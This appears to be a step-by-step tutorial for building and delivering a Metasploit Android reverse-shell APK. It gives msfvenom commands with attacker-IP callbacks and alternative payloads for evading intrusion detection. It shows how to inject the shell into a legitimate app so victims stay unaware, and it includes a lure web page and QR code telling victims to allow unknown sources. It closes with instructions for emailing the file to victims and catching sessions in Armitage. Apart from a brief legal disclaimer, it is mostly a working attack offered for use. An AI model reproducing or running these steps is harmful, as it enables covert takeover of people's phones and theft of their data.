Basic Android Demo:
APK Injection Demo:
Only use this in a legal and controlled environment and on equipment you are authorized to use in such a manner!
Commands to follow along with the Basic Android Demo video are below.
sudo apt-get install qrencode
Change 192.168.1.102 to your IP Address. The command below creates an APK installer file that will run shell code that connects back to your IP. If the victim is in the same network as you then you may use your Local IP here. This can be found using the command ifconfig. If the victim is outside of your local network then use your WAN/Public IP here. If using your WAN/Public IP be sure port forwarding is enabled in your router and a forward is set for the Port specified in the payload and the Local IP of your Kali box. You may need to read ahead in this write up to gather a better understanding of these settings. If Kali is running as a virtual machine be sure the network adapter is configured for bridged mode. You can find this in your virtual machine settings.
sudo msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.102 lport=4590 R > app.apk
########### NOTES ########### Listed below are some alternative payloads that tunnel traffic through a different protocol, using https may evade some intrusion detection as well, also remember the victims ISP/Network Configuration may be blocking non-standard ports(common) so you may change the ports as you see fit sudo msfvenom -p android/meterpreter/reverse_http LHOST=192.168.1.102 lport=8080 R > app.apk sudo msfvenom -p android/meterpreter/reverse_https LHOST=192.168.1.102 lport=8443 R > app.apk If you use choose to use either of the two payloads listed above instead of the one shown in the video then be sure to select the proper payload listener once you start Armitage
CUSTOM APK TEMPLATES
The default template is not very convincing as it opens an application that does nothing besides give you a shell. You may use another APK as a template, just Google "App-to-poison APK Download".
First install zipalign using the command:
apt-get install zipalign
Now issue the following command (make sure the APK to poison is in your working directory, else "cd" to it now):
msfvenom -x template-apk-to-poison-here.apk -p android/meterpreter/reverse_https LHOST=IPHERE LPORT=PORTHERE -o app.apk
Now the victim installs and opens the poisoned APK, you get a shell and they use the app like normal, completely oblivious.
This is the most realistic method to getting a shell on Android using a msfvenom generated APK.
########### END NOTES ###########
service apache2 start
Change 192.168.1.102 to your IP Address. Same rules about choosing which IP to use that were mentioned earlier still apply here.
qrencode -l H 'http://192.168.1.102' -o app.png
Copy/Paste the following html or modify for your application
<html> <body><center> <h1>Really Cool App!</h1> <br> <b><a href="/app.apk" target="_blank">Click Here to Download our APP!</a></b> <br><br> Depending on your QR scanning software you may need to select "open this link in your default web browser" in order to download our APP. Also be sure to <b>temporarily</b> allow installation from unknown sources in your settings when prompted. </center> </body> </html>
service postgresql start
Open Armitage from the Main Menu(Applications) - Exploitation Tools - armitage
Select payload->android->meterpreter->reverse_tcp (unless you chose a different payload)
Change LPORT to 4590 (if you are using reverse_tcp and following the video change it to 4590, but if you selected https then use 8443 and for http use 8080, unless you modified those ports creating the payload)
Email the victim the malicious apk file or print the qr code and give it to the victim.
This is a social engineering attack vector, so be creative!
Wait for victim to download, install, and open the program. They will automatically connect to you and their host will appear in the hosts window with red lightning around the icon.
You can also use the console to check sessions with
Only use this knowledge in a legal and controlled manner. We are not responsible for your actions.
To remove the exploit from the phone go to Settings - Apps - Downloaded and uninstall the app "MainActivity".